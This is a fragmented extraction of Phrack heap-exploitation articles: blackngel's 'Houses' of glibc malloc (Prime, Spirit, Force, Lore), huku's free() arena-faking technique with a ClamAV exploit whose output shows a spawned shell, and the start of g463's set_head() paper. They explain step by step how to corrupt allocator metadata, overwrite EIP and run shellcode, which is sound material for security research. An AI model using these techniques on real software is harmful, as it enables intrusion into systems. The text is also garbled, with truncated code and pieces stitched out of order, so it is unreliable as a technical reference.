[3. Malloc des-maleficarum - blackngel]
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
local_age = age;
strncpy(buffer, str1, sizeof(buffer)-1);
free(ptr1);
printf("\nEND free(1)\n");
free(ptr2);
printf("\nEND free(2)\n");
ptr3 = malloc(1024);
printf("\nEND malloc()\n");
strncpy(ptr3, str2, 1024-1);
return 0;
}
[-----]
Page
123
[3. Malloc des-maleficarum - blackngel]
Then:
fb = &(av->fastbins[-1]) = &av->max_fast;
In the last sentence: (*fb = p), av-> max_fast will be overwritten with
the address of our chunk being free()'d.
The result is very evident, from that moment we can run the same piece of
code in free() whenever the size of chunk that will be passed to free()
is less than the value of the chunk address "p" previously free()'d.
To pass the integrity chesks of the first free() call, we need these
sizes:
[-----]
int i, j;
[-----]
Taking the example of Phantasmal, we would have to resize the second chunk
to with the next value:
You have to check again the "size" field of the next chunk, whose address
is calculated from the value that we obtain a moment ago.
[-----]
Page
124
[3. Malloc des-maleficarum - blackngel]
putchar(0x41);
fwrite("\x19\x09\x00\x00", 4, 1, stdout); /* free(2) ptr2 size */
.... /* Later */
[-----]
This value will be used by the call to malloc () setting it as the "arena"
structure to use.
arena_get(ar_ptr, bytes);
if(!ar_ptr)
return 0;
victim = _int_malloc(ar_ptr, bytes);
.....
.....
"av" is now our arena, which starts at the beginning of the second chunk
liberated "p2", then it is clear that "av->max_fast" will be equal to the
"size" field of the chunk. In order to pass the first integrity check, we
have to ensure that the size requested by the "malloc()" call is less than
that value, as Phantasmal said, otherwise you can try the technique
described in 4.2.1.
Then we can see that "fb" is set to address of a "fastbin" in "av", and in
the following sentence, its content will be the final address of "victim".
Remember that our goal is to allocate an amount of bytes into a place of
our choice.
Well, that is where we need to copy repeatedly the address that we want
in the stack, so any return "fastbin" set our address in "fb".
Mmmmm, but wait a moment, the next condition is the most important:
Page
125
[3. Malloc des-maleficarum - blackngel]
This means that the "size" field of our fakechunk must be equal to the
amount requested by "malloc()". This is the last requirement in The House
of Prime. We must control a value into memory and place address of
"victim" just 4 bytes before, so this value would become its new size.
[-----]
END free(2)
[-----]
We are really close to EBP and EIP. What happens if our "name" is
composed by a few letters "A"?
[-----]
END free(2)
END malloc()
Page
126
[3. Malloc des-maleficarum - blackngel]
[-----]
Bingo! I think that you can put your own Shellcode, right?
[-----]
check_inuse_chunk(av, p);
[-----]
[ Xavier Zubiri ]
-----------------------
---[ 4.2.1 ---[ unsorted_chunks() ]---
-----------------------
Page
127
[3. Malloc des-maleficarum - blackngel]
"av->bins[0]" and not its value, which means that we must devise another
method.
.....
victim = unsorted_chunks(av)->bk
bck = victim->bk;
.....
.....
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
.....
victim = &av->bins[0]+4;
Perhaps through this clever way you can directly reach The House of Prime.
Page
128
[3. Malloc des-maleficarum - blackngel]
[ J. P. Sartre ]
-------------------------
---[ 4.3 ---[ THE HOUSE OF SPIRIT ]---
-------------------------
The House of Spirit is, undoubtedly, one of the most simple applied
technique when circumstances are propitious. The goal is to overwrite
a pointer that was previously allocated with a call to "malloc()" so
that when this is passed to free(), an arbitrary address will be stored
in a "fastbin[]".
This can bring that in a future call to malloc(), this value will be taken
as the new memory for the requested chunk. And what happens if I do that
this memory chunk to fall into any specific area of stack?
Well, if we can control what we write in, we can change everything value
that is ahead. As always, this is where EIP enters to the game.
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
local_age = age;
free(ptr1);
return 0;
}
[-----]
Page
129
[3. Malloc des-maleficarum - blackngel]
With this in mind, we can change the address of the chunk, but not all
addresses are valid. Remember that in order to execute the "fastbin" code
described in The House of Prime, we need a minor value than "av->max_fast"
and, more specifically, as Phantasmal said, it has to be equal to the size
requested in the future call to "malloc()" + 8.
In our case we see that the value is just behind EBP, and PTR1 would must
point to EBP. Remember that we are modifying the pointer to memory, not
the chunk's address.
... at $EBP - 4 + 48 we must have a value that meets the above conditions.
Otherwise you should look for another addresses of memory that can allow
you to control both values.
Page
130
[3. Malloc des-maleficarum - blackngel]
[-----]
(gdb) c
Continuing.
PTR1 = [ 0x80c2688 ]
PTR1 = [ 0xbffff318 ]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[-----]
In this special case, the address of EBP would be the address of PTR2 zone
data, which means that the fourth write character will overwrite EIP, and
you will can point to your Shellcode.
Page
131
[3. Malloc des-maleficarum - blackngel]
Now you can feel the power of witches. We arrived, flying in broom at The
House of Spirit.
[ Federico Fellini ]
-------------------------
---[ 4.4 ---[ THE HOUSE OF FORCE ]---
-------------------------
The main goal of this technique is to reach the next piece of code in
"_int_malloc ()":
[-----]
.....
use_top:
victim = av->top;
size = chunksize(victim);
[-----]
Page
132
[3. Malloc des-maleficarum - blackngel]
[-----]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
ptr1 = malloc(256);
printf("\nPTR1 = [ %p ]\n", ptr1);
strcpy(ptr1, str);
return 0;
}
[-----]
This ensures that any request of memory enough large, is treated with
the code "_int_malloc()", instead of expand the heap.
victim = av->top;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
PTR1 = [ 0x80c2688 ]
Page
133
[3. Malloc des-maleficarum - blackngel]
As we can see, "remainder" is exactly the sum of this address plus the
number of bytes requested by "malloc ()". This amount must be controlled
by the designer as mentioned above.
Since that time, "av->top" contain our altered value, and any request that
triggers this piece of code, get this address as its data zone. Everything
that is written will destroy the stack.
....
void *p = chunk2mem(victim);
if (__builtin_expect (perturb_byte, 0))
alloc_perturb (p, bytes);
return p;
Let's to go:
[-----]
Page
134
[3. Malloc des-maleficarum - blackngel]
PTR1 = [ 0x80c2688 ]
[-----]
NOTE: As you have seen in the introduction of this article, g463 wrote a
paper about how to take advantage of the set_head() macro in order
to overwrite an arbitrary memory address. This would be strongly
recommendable that you read this work. He also presented a briew
research about The House of Force...
Due to a serious error of mine, I did not read this article until
a Phrack member warned me of its existence after I had edited my
article. I can't avoid feeling amazed at the level of skills these
people are reaching. The work of g463 is really smart.
.....
char buffer[64];
ptr2 = malloc(len);
ptr3 = calloc(256);
Page
135
[3. Malloc des-maleficarum - blackngel]
done through the function "calloc()" and in this case do not control their
content, but we control a buffer declared at the beginning of the
vulnerable function.
But soon I warned that the alignment of malloc() algorithm when this is
called, thwarts this possibility. We could overwrite EBP completely with
"0's", which is useless for our purposes. And besides, always there to
take care not to crush our buffer[] with zeros if the reserve of memory
occurs after the content has been established by the user.
[ D. Ruiz Larrea ]
---------------
---[ 4.4.1 ---[ MISTAKES ]---
---------------
In fact, what we have done in the previous section, the fact of using the
stack was the only viable solution that I found, after realize some errors
that Phantasmal had not expected.
... we can see that both addresses are behind the address of "av->top",
and an amount not lead us to these addresses. Function pointers, the BSS
region, and also other things are behind...
It is by this that the Malloc Maleficarum did not mention that the
Page
136
[3. Malloc des-maleficarum - blackngel]
Imposible is nothing in this world, and I know that you can feel The House
of Force.
[ E. Galeano ]
-----------------------
---[ 4.5 ---[ THE HOUSE OF LORE ]---
-----------------------
But I again repeat the same thing I said at the end of the technique The
House of Mind (CVS vulnerability). And the same showed case is perfect for
the conditions that should meet in The House of Lore. We need multiple
calls to malloc( ) controlling their sizes.
victim_index = smallbin_index(size);
fwd = bck->fd;
Page
137
[3. Malloc des-maleficarum - blackngel]
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
.....
if ( (victim = last(bin)) != bin) {
if (victim == 0) /* initialization check */
malloc_consolidate(av);
else {
bck = victim->bk;
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;
...
return chunk2mem(victim);
.....
In this technique, Phantasmal said that the ultimate goal was to overwrite
"bin->bk," but the first element that we can control is "victim->bk". As
far as I can understand, we must ensure that the overflowed chunk passed
to "free ()" is in the previous position to "last", so that "victim->bk"
point to its address, that we must control and should point to the stack.
This address is passed to "bck" and then will change "bin->bk". Due to
this, we now control the "last" chunk with a designer controlled address.
Page
138
[3. Malloc des-maleficarum - blackngel]
That is why we need a new call to "malloc()" with same size as the
previous call, so that this value is the new "victim" and is returned in:
[-----]
___[chunk]_____[chunk]_____[chunk]____
| |
! bk bk |
[bin]----->[last=victim]----->[ ptr1 ]---/
^____________| ^_______________|
fwd ^ fwd
|
return chunk2men(victim);
___[chunk]_____[chunk]_____[chunk]____
| |
! bk bk |
[bin]----->[ ptr1 ]--------->[ chunk ]---/
^___________| ^________________|
fwd ^ fwd
|
return chunk2men(ptr1);
[-----]
One must be careful with that also overwrites "bck->fd" in turn, in the
stack it is not a big problem.
In theory, using a similar technique, a false chunk should can been sited
in its corresponding "bin" and trigger a further call to "malloc()" that
could returns the same memory space.
#define NSMALLBINS 64
#define SMALLBIN_WIDTH MALLOC_ALIGNMENT
#define MIN_LARGE_SIZE (NSMALLBINS * SMALLBIN_WIDTH)
Page
139
[3. Malloc des-maleficarum - blackngel]
For "largebin" method will have to use larger chunks than this estimated
size.
Like all houses, it's only a way of playing, and The House of Lore,
although not very suitable for a credible case, no one can say that
is a complete exception...
[ V. R. Potter ]
------------------------------
---[ 4.6 ---[ THE HOUSE OF UNDERGROUND ]---
------------------------------
In this world are all possibilities. Chances that something goes well, or
chances of something going wrong. In the world of the vulnerabilities
exploitation, this remains true. The problem is to get the neccesary
skills to find these possibilities, usually the possibility of that
something goes well.
For example ... what about using in a same instant the The House of Mind
and The House of Spirit methods?
Consider that both have their own limitations. On the one hand, The House
Mind need as has been said a piece of memory in an above address that
"0x08100000", while The House of Spirit, states that once the pointer to
be free()ed has been overwritten, a new call to malloc() will be done.
In The House of Mind, the main goal is to control the "arena" structure
and this change starts with the modification of the third bit less
significant of the size field of the overwritten chunk (P). But the fact
we can modify this metadata, does not mean that we have control of the
address of this chunk.
You may still investigate new avenues, but I would not be assured that
running.
Page
140
[3. Malloc des-maleficarum - blackngel]
public_fREe(Void_t* mem)
We can make it point to some place like the stack or the environment. It
should always be a memory location with data controlled by the user. Then
the effective address of the chunk would taken at:
p = mem2chunk(mem);
At this point we leave The House of The Spirit to focus on The House of
Mind. Then again we must control the arena "ar_ptr" and, to achieve this,
(&p + 4) should contain a size with the NON_MAIN_ARENA bit enabled.
But that is not the most important thing here, the final question is:
could you put the chunk in a place so that you can then control the area
returned by "heap_for_ptr(ptr)->ar_ptr"?
But again, all ways should be studied, you could find a new method, and
perhaps you call it The House of Underground...
----------------------------------------
---[ 5 ---[ ASLR and Nonexec Heap (The Future) ]---
----------------------------------------
This way of working is not very reliable in the days we live in...
Page
141
[3. Malloc des-maleficarum - blackngel]
Regarding to the first topic, we have a magic work, "Bypassing PaX ASLR
protection" [11] by Tyler Durden in Phrack 59.
Since I started my little research and work to write this article, my goal
has always been to leave this task as the homework for new hackers who
have the strength to continue in this way.
[ Confucio ]
-------------------------
---[ 6 ---[ THE HOUSE OF PHRACK ]---
-------------------------
This is just a way so you can continue researching. There is a world full
of possibilities, and most of them still aren't discovered. Do you want
be the next?
As far as I understand, this means that all those who had written in
Phrack are childhood, crackers, lower life forms and are marked in the
hacker culture as losers.
Is there some connection between our name and our skills, philosophy
of life or our ethics in hacking?
Page
142
[3. Malloc des-maleficarum - blackngel]
Me, in my sole opinion, if this is true, I am proud that Phrack admit into
their lines to lower life forms. Lower life forms that have helped to
raise the security level of the network of networks in ways unimaginable.
blackngel
----------------
---[ 7 ---[ REFERENCES ]---
----------------
Page
143
[3. Malloc des-maleficarum - blackngel]
Page
144
[4. Yet another free() exploitation technique - huku]
|=-----------------------------------------------------------------------=|
|=-------------=[ Yet another free() exploitation technique ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By huku ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ huku <huku _at_ grhack _dot_ net ]=--------------=|
|=-----------------------------------------------------------------------=|
---[ Contents
I. Introduction
II. Brief history of glibc heap exploitation
III. Various facts regarding the glibc malloc() implementation
1. Chunk flags
2. Heaps, arenas and contiguity
3. The FIFO nature of the malloc() algorithm
4. The prev_size under our control
5. Debugging and options
IV. In depth analysis on free()'s vulnerable paths
1. Introduction
2. A trip to _int_free()
V. Controlling unsorted_chunks() return value
VI. Creating fake heap and arena headers
VII. Putting it all together
VIII. The ClamAV case
1. The bug
2. The exploit
IX. Epilogue
X. References
XI. Attachments
---[ I. Introduction
When articles [01] and [02] were released in Phrack 57, heap
exploitation techniques became a common fashion. Various heap
exploits were, and are still published on various security related
lists and sites. Since then, the glibc code, and especially malloc.c,
evolved dramatically and eventually, various heap protection schemes
were added just to make exploitation harder.
Page
145
[4. Yet another free() exploitation technique - huku]
our technique.
The glibc versions revised during the analysis were 2.3.6, 2.4, 2.5
and 2.6 (the latest version at the time of writing). Version 2.3.6
was chosen due to the fact that glibc versions greater or equal to
2.3.5 include additional security precautions. Examples were not
tested on systems running glibc 2.2.x since it is considered quite
obsolete.
Page
146
[4. Yet another free() exploitation technique - huku]
But enough about the past. Before entering a new chapter of the
malloc() history, the author would like to clarify a few details
regarding malloc() internals. It's actually the very basis of what
will follow.
Probably, you are already familiar with the layout of the malloc()
chunk header as well as with its 'size' and 'prev_size' fields.
What is usually overlooked is the fact that apart from PREV_INUSE,
the 'size' field may also contain two more flags, the IS_MMAPPED
and the NON_MAIN_ARENA, the latter being the most interesting one.
When the NON_MAIN_ARENA flag is set, it indicates that the chunk
is part of an independent mmap()'ed memory region.
...+----------+-----------+---------+-...-+---------+...
| Heap hdr | Arena hdr | Chunk_1 | | Chunk_n |
...+----------+-----------+---------+-...-+---------+...
Page
147
[4. Yet another free() exploitation technique - huku]
#define heap_for_ptr(ptr) \
((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
--- snip ---
Notice that the arena header contains a field called 'flags'. The
3rd MSB of this integer indicates wether the arena is contiguous
or not. If not, certain contiguity checks during malloc() and free()
are ignored and never performed. By taking a closer look at the
heap header, one can also notice that a field named 'ar_ptr' also
exists, which of course, should point to the arena header of the
current heap. Since the arena header physically borders the heap
header, the 'ar_ptr' field can easily be calculated by adding the
size of the heap_info structure to the address of the heap itself.
int main() {
void *a, *b, *c;
a = malloc(16);
b = malloc(16);
fprintf(stderr, "a = %p | b = %p\n", a, b);
a = realloc(a, 32);
fprintf(stderr, "a = %p | b = %p\n", a, b);
c = malloc(16);
fprintf(stderr, "a = %p | b = %p | c = %p\n", a, b, c);
free(a);
free(b);
free(c);
return 0;
}
Page
148
[4. Yet another free() exploitation technique - huku]
This code will allocate two chunks of size 16. Then, the first chunk
is realloc()'ed to a size of 32 bytes. Since the first two chunks
are physically adjacent, there's not enough space to extend 'a'.
The allocator will return a new chunk which, physically, resides
somewhere after 'a'. Hence, a hole is created before the first
chunk. When the code requests a new chunk 'c' of size 16, the
allocator notices that a free chunk exists (actually, this is the
most recently free()'ed chunk) which can be used to satisfy the
request. The hole is returned to the user. Let's verify.
Indeed, chunk 'c' and the initial 'a', have the same address.
Last but not least, the signedness and size of the 'size' and
'prev_size' fields are totally configurable. You can change them
by resetting the INTERNAL_SIZE_T constant. Throughout this article,
the author used a x86 32bit system with a modified glibc, compiled
with the default options. For more info on the glibc compilation
for debugging purposes see [11], a great blog entry written by
Echothrust's Chariton Karamitas (hola dude!).
--[ 1. Introduction
Before getting into more details, the author would like to stress
the fact that the technique presented here requires that the attacker
is able to write null bytes. That is, this method targets read(),
recv(), memcpy(), bcopy() or similar functions. The str*cpy() family
of functions can only be exploited if certain conditions apply (e.g.
when decoding routines like base64 etc are used). This is, actually,
the only real life limitation that this technique faces.
Page
149
[4. Yet another free() exploitation technique - huku]
buffer for each client. The attacker can force the daemon to allocate
contiguous buffers into the heap by repeatedly firing up connections
to the target host. This is an old technique used to stabilize the
heap state (e.g in openssl-too-open.c). Controlling the heap memory
allocation and freeing is a fundamental precondition required to
build any decent heap exploit after all.
Ok, let's start the actual analysis. Consider the following piece
of code.
if(argc != 3) {
fprintf(stderr, "%s <n> <size>\n", argv[0]);
return -1;
}
n = atoi(argv[1]);
size = atoi(argv[2]);
c1 = malloc(80);
fprintf(stderr, "[~] Chunk 1 at %p\n", c1);
c2 = malloc(80);
fprintf(stderr, "[~] Chunk 2 at %p\n", c2);
c3 = malloc(80);
fprintf(stderr, "[~] Chunk 3 at %p\n", c3);
c4 = malloc(80);
fprintf(stderr, "[~] Chunk 4 at %p\n", c4);
return 0;
}
--- snip ---
Page
150
[4. Yet another free() exploitation technique - huku]
four contiguous chunks. Notice that the first one is under the
attacker's control. At (2) the code calls free() on the second
chunk, the one physically bordering the attacker's block. To see
what happens from there on, one has to delve into the glibc free()
internals.
When a user calls free() within the userspace, the wrapper __libc_free()
is called. This wrapper is actually the function public_fREe()
declared in malloc.c. Its job is to perform some basic sanity checks
and then control is passed to _int_free() which does the hard work
of actually freeing the chunk. The whole code of _int_free() consists
of a 'if', 'else if' and 'else' block, which handles chunks depending
on their properties. The 'if' part handles chunks that belong to
fast bins (i.e whose size is less than 64 bytes), the 'else if'
part is the one analyzed here and the one that handles bigger chunks.
The last 'else' clause is used for very big chunks, those that were
actually allocated by mmap().
if(...) {
/* Handle chunks of size less than 64 bytes. */
}
else if(...) {
/* Handle bigger chunks. */
}
else {
/* Handle mmap()ed chunks. */
}
}
--- snip ---
One should actually be interested in the 'else if' part which handles
chunks of size larger than 64 bytes. This means, of course, that
the exploitation method presented here works only for such chunk
sizes but this is not much of a big obstacle as most everyday
applications allocate chunks usually larger than this.
Page
151
[4. Yet another free() exploitation technique - huku]
*/
nextchunk = chunk_at_offset(p, size);
...
...
--- snip ---
So, first _int_free() checks if the chunk being freed is the top
chunk. This is of course false, so the attacker can ignore this
test as well as the following three.
...
...
--- snip ---
Page
152
[4. Yet another free() exploitation technique - huku]
...
...
/* (1) */
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
/* The 'p' pointer is controlled by the attacker.
* It's the prev_size field of the second chunk
* which is accessible at the end of the usable
* area of the attacker's chunk.
*/
bck->fd = p;
fwd->bk = p;
...
...
}
--- snip ---
Page
153
[4. Yet another free() exploitation technique - huku]
Page
154
[4. Yet another free() exploitation technique - huku]
The 'M' and 'm' parameters of these macros refer to the arena where
a chunk belongs. A real life usage of unsorted_chunks() is briefly
shown below.
The arena for chunk 'p' is first looked up and then used in the
unsorted_chunks() macro. What is now really interesting is the way
the malloc() implementation finds the arena for a given chunk.
For a given chunk (like 'p' in the previous snippet), glibc checks
whether this chunk belongs to the main arena by looking at the
'size' field. If the NON_MAIN_ARENA flag is set, heap_for_ptr() is
called and the 'ar_ptr' field is returned. Since the attacker
controls the 'size' field of a chunk during an overflow condition,
she can set or unset this flag at will. But let's see what's the
return value of heap_for_ptr() for some sample chunk addresses.
Page
155
[4. Yet another free() exploitation technique - huku]
#define heap_for_ptr(ptr) \
((void *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
if(argc != 2) {
fprintf(stderr, "%s <n>\n", argv[0]);
return -1;
}
return 0;
}
--- snip ---
This code prints the first N heap addresses. So, for a chunk that
has an address of 0xdeadbeef, its heap location is at most 1Mbyte
backwards. Precisely, chunk 0xdeadbeef belongs to heap 0xdea00000.
So if an attacker controls the location of a chunk's theoretical
heap address, then by overflowing the 'size' field of this chunk,
they can fool free() to assume that a valid heap header is stored
Page
156
[4. Yet another free() exploitation technique - huku]
This is not a rare situation; in fact this is how most real life
heap exploits work. Forcing the target application to perform a
number of continuous allocations, helps the attacker control the
arena header. Since the heap is not randomized and the chunks are
sequentially allocated, the heap addresses are static and can be
used across all targets! Even if the target system is equipped with
the latest kernel and has heap randomization enabled, the heap
addresses can be easily brute forced since a potential attacker
only needs to know the upper part of an address rather than some
specific location in the virtual address space.
Notice that the code shown in the previous snippet always produces
the same results and precisely the ones depicted above. That is,
given the approximation of the address of some chunk one tries to
overflow, the heap address can be easily precalculated using
heap_for_ptr().
For example, suppose that the last chunk allocated by some application
is located at the address 0x080XXXXX. Suppose that this chunk belongs
to the main arena, but even If it wouldn't, its heap address would
be 0x080XXXXX & 0xfff00000 = 0x08000000. All one has to do is to
force the application perform a number of allocations until the
target chunk lies beyond 0x08100000. Then, if the target chunk has
an address of 0x081XXXXX, by overflowing its 'size' field, one can
make free() assume that it belongs to some heap located at 0x08100000.
This area is controlled by the attacker who can place arbitrary
data there. When public_fREe() is called and sees that the heap
address for the chunk to be freed is 0x08100000, it will parse the
data there as if it were a valid arena. This will give the attacker
the chance to control the return value of unsorted_chunks().
Once an attacker controls the contents of the heap and arena headers,
what are they supposed to place there? Placing random arbitrary
values may result in the target application getting stuck by entering
endless loops or even segfaulting before its time, so, one should
be careful in not causing such side effects. In this section, we
deal with this problem. Proper values for various fields are shown
and an exploit for our example code is developed.
if(p != av->top) {
if(contiguous(av)) {
assert(((char*)p) >= min_address);
assert(((char*)p + sz) <= ((char*)(av->top)));
}
}
Page
157
[4. Yet another free() exploitation technique - huku]
Since the attacker controls the arena flags, if they set it to some
integer having the third least significant bit set, then contiguous(av)
is false and the assert() checks are ignored. Additionally, providing
an 'av->top' pointer equal to the heap address, results in 'max_address'
and 'min_address' getting valid values, thus avoiding annoying
segfaults due to invalid pointer accesses. It seems that the first
set of problems was easily solved.
Do you think it's over? Hell no. After some lines of code are
executed, _int_free() uses the macro __builtin_expect() to check
if the size of the chunk right next to the one being freed (the
third chunk) is larger than the total available memory of the arena.
This is a good measure for detecting overflows and any decent
attacker should get away with it.
Page
158
[4. Yet another free() exploitation technique - huku]
mutex_lock(&ar_ptr->mutex);
++(ar_ptr->stat_lock_wait);
}
#else
mutex_lock(&ar_ptr->mutex);
#endif
--- snip ---
Right now there are no more restrictions, we can just place the
value 0x08100020 (the heap header offset plus the heap header size)
in the 'ar_ptr' field of the _heap_info structure, and give the
value retloc-12 to bins[0] (where retloc is the return location
where the return address will be written). Recall that the return
address points to the 'prev_size' field of the chunk being freed,
an integer under the attacker's control. What should one place
there? This is another problem that needs to be solved.
Since only a small amount of bytes is needed for the heap and the
arena headers at 0x08100000 (or similar address), one can use this
area for storing shellcode and nops as well. By setting the 'prev_size'
field of the chunk being freed equal to a JMP instruction, one can
branch some bytes ahead or backwards so that execution is transfered
somewhere in 0x08100000 but, still, after the heap and arena headers!
Valid locations are 0x08100000+X with X >= 72, that is, X should
be an offset after the heap header and after bins[0]. This is not
as complicated as it sounds, in fact, all addresses needed for
exploitation are static and can be easily precalculated!
int main() {
char buffer[65535], *arena, *chunks;
Page
159
[4. Yet another free() exploitation technique - huku]
Page
160
[4. Yet another free() exploitation technique - huku]
It seems that all the values for the arena named 'av', are in
position.
* An attacker must make sure that they can overflow the chunk right
next to the one under their control. For example, if the chunk from
0x080XXXXX to 0x08101000 is under control, then chunk 0x08101001-
0x0810XXXX should be overflowable (or just any chunk at 0x081XXXXX).
Page
161
[4. Yet another free() exploitation technique - huku]
[heap_hdr][arena_hdr][...]|[AAAA][...]|[BBBB][...]|[CCCC]
[AAAA] -> The size of the second chunk plus PREV_INUSE and
NON_MAIN_ARENA.
* The target chunks should be larger than 64 bytes and less than
the mmap() threshold.
* An attacker must have the ability to write null bytes. That is,
one should be able to overflow the chunks via memcpy(), bcopy(),
read() or similar since strcpy() or strncpy() will not work! This
is probably the most important precondition for this technique.
Page
162
[4. Yet another free() exploitation technique - huku]
When make has finished its job, we have to make sure everything is
ok by running ldd on clamscan and checking the paths to the shared
libraries.
Now let's focus on the buggy code. The actual vulnerability exists
in the preprocessing of PE (Portable Executable) files, the well
known Microsoft Windows executables. Precisely, when ClamAV attempts
to dissect the headers produced by a famous packer, called MEW, an
integer overflow occurs which later results in an exploitable
condition. Notice that this bug can be exploited using various
techniques but for demonstration purposes I'll stick to the one I
presented here. In order to have a more clear insight on how things
work, you are also advised to read the Microsoft PE/COFF specification
[13] which, surprisingly, is free for download.
Page
163
[4. Yet another free() exploitation technique - huku]
First, 'ssize' and 'dsize' get their initial values which are
controlled by the attacker. These values represent the virtual size
of two contiguous sections of the PE file being scanned (don't try
to delve into the MEW packer details since you won't find any
documentation which will be useless even if you will). The sum of
these user supplied values is used in cli_calloc() which, obviously,
is just a calloc() wrapper. This allows for an arbitrary sized heap
allocation, which can later be used in the read operation. There
are endless scenarios here, but lets see what are the potentials
of achieving code execution using the new free() exploitation
technique.
0xdea00000 0xdeadbeef
...+----------+-----------+-...-+-------------+--------------+...
| Heap hdr | Arena hdr | | Chunk 'src' | Other chunks |
...+----------+-----------+-...-+-------------+--------------+...
So, if one manages to overwrite the whole region, from the heap
header to the 'src' chunk, then they can also overwrite the chunks
neighboring 'src' and perform the technique presented earlier. But
there are certain obstacles which can't be just ignored:
* 3 More chunks should be present right after the 'src' chunk and
they should be also alterable by the overflow.
* One can force ClamAV not to mess with the chunks between the heap
header and the 'src' chunk. An attacker may achieve this by following
a precise vulnerable path.
Page
164
[4. Yet another free() exploitation technique - huku]
* Since the heap is, by default, not randomized, one can precalculate
the 'src' value using gdb or some custom malloc() debugger (just
like I did). This specific bug is hard to exploit when randomization
is enabled. On the contrary, the general technique presented in
this article, is immune to such security measures.
free(section_hdr);
--- snip ---
if(!CLI_ISCONTAINED(exe_sections[1].rva, exe_sections[1].vsz,
cli_readint32(buff + 0x7c) + fileoffset + 0x80, 4)) {
...
free(src);
}
}
--- snip ---
Page
165
[4. Yet another free() exploitation technique - huku]
So, here's how the exploit for this ClamAV bug looks like. For more
info on the exploit usage you can check the related README file in
the attachment. This code creates a specially crafted .exe file,
which, when passed to clamscan, spawns a shell.
sh-3.2$ echo yo
yo
sh-3.2$ exit
exit
--- snip ---
Anyway, all that stuff kinda exhausted me. I wouldn't have managed
to write this article without the precious help of GM, eidimon and
Page
166
[4. Yet another free() exploitation technique - huku]
---[ X. References
Page
167
[4. Yet another free() exploitation technique - huku]
Page
168
[5. The use of set_head to defeat the wilderness – g463]
1 - Introduction
3 - Automation
3.1 - Define the basic properties
3.2 - Extract the formulas
3.3 - Compute the values
4 - Limitations
4.1 - Requirements of two different techniques
4.1.1 - The set_head() technique
4.1.2 - The "House of Force" technique
4.2 - Almost 4 bytes to almost anywhere technique
4.2.1 - Everything in life is a multiple of 8
4.2.2 - Top chunk's size needs to be bigger than the requested malloc
size
4.2.3 - Logical OR with PREV_INUSE
6 - Examples
6.1 - The basic scenarios
6.1.1.1 - The most basic form of the set_head() technique
6.1.1.2 - Exploit
6.1.2.1 - Multiple overwrites
6.1.2.2 - Exploit
6.2 - A real case scenario: file(1) utility
6.2.1 - The hole
6.2.2 - All the pieces fall into place
6.2.3 - hanuman.c
7 - Final words
8 - References
--[ 1 - Introduction
Many papers have been published in the past describing techniques on how to
take advantage of the inbound memory management in the GNU C Library
Page
169
[5. The use of set_head to defeat the wilderness – g463]
This paper will present the details of the technique. Also, it will show
you how to practically apply this technique to other exploits. The
limitations of the technique will also be presented. Finally, some
examples will be shown to better understand the various aspects of the
technique.
Most of the time, people who write exploits using malloc techniques are not
aware of the difficulties that the wilderness chunk implies until they face
the problem. It is only at this exact time that they realize how the known
techniques (i.e. unlink, etc.) have no effect on this particular context.
As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
opponents of the attacker who tries to exploit heap mismanagement. Because
this chunk of memory is handled specially by the dlmalloc internal
routines, the attacker will rarely be able to execute arbitrary code if
they solely corrupt the boundary tag associated with the wilderness chunk."
This is not the first time that the exploitation of the wilderness chunk
has been specifically targeted. The pioneer of this type of exploitation
is Phantasmal Phantasmagoria.
The idea behind "The House of Force" is quite simple but there are specific
steps that need to be followed. Below, you will find a brief summary of
all the steps.
Step one:
Page
170
[5. The use of set_head to defeat the wilderness – g463]
The first step in the "House of Force" consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is. The preferred new size of the top chunk should be
0xffffffff. Below is a an ascii graphic of the memory layout at the time
of the overflow. Notice that the location of the top chunk is somewhere in
the heap.
Step two:
The purpose of this step is to move the top chunk right before a global
offset table entry. The new location of the top chunk is the sum of the
current address of the top chunk and the value of the malloc call. This
sum is done with the following line of code:
After the malloc call, the memory layout should be similar to the
representation below:
Page
171
[5. The use of set_head to defeat the wilderness – g463]
Step three:
Page
172
[5. The use of set_head to defeat the wilderness – g463]
Now that the basic review of the "House of Force" technique is done, let's
look at the set_head() technique. The basic idea behind this technique is
to use the set_head() macro to write almost four arbitrary bytes to almost
anywhere in memory. This macro is normally used to set the value of the
size field of a memory chunk to a specific value. Let's have a peak at the
code:
This line is very simple to understand. It takes the memory chunk 'p',
modifies its size field and replace it with the value of the variable 's'.
If the attacker has control of those two parameters, it may be possible to
modify the content of an arbitrary memory location with a value that he
controls.
First step:
The first step of the set_head() technique consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is. The specific value that you will overwrite with will
depend on the parameters of the exploitable situation. Below is an ascii
graphic of the memory layout at the time of the overflow. Notice that the
location of the top chunk is somewhere in the heap.
Page
173
[5. The use of set_head to defeat the wilderness – g463]
Second step:
The purpose of this step is to move the top chunk before the location that
you want to overwrite. This location needs to be on the stack, and you
will see why at section 4.2.2. During this step, the malloc code will set
the size of the new top chunk with the set_head() macro. Look at the
representation below to better understand the memory layout at the time of
the overwrite:
If you control the new location of the top chunk and the new size of the
top chunk, you can get a "write almost 4 arbitrary bytes to almost
anywhere" primitive.
The set_head macro is used many times in the malloc library. However, it's
used at a particularly interesting emplacement where it's possible to
influence its parameters. This influence will let the attacker overwrite 4
bytes in memory with a value that he can control.
When there is a call to malloc, different methods are tried to allocate the
Page
174
[5. The use of set_head to defeat the wilderness – g463]
requested memory. MaXX did a pretty great job at explaining the malloc
algorithm in section 3.5.1 of his text[3]. Reading his text is highly
suggested before continuing with this text. Here are the main points of
the algorithm:
If those three steps fail, interesting things happen. The malloc function
tries to split the top chunk. The 'use_top' code portion is then called.
It's in that portion of code that it's possible to take advantage of a call
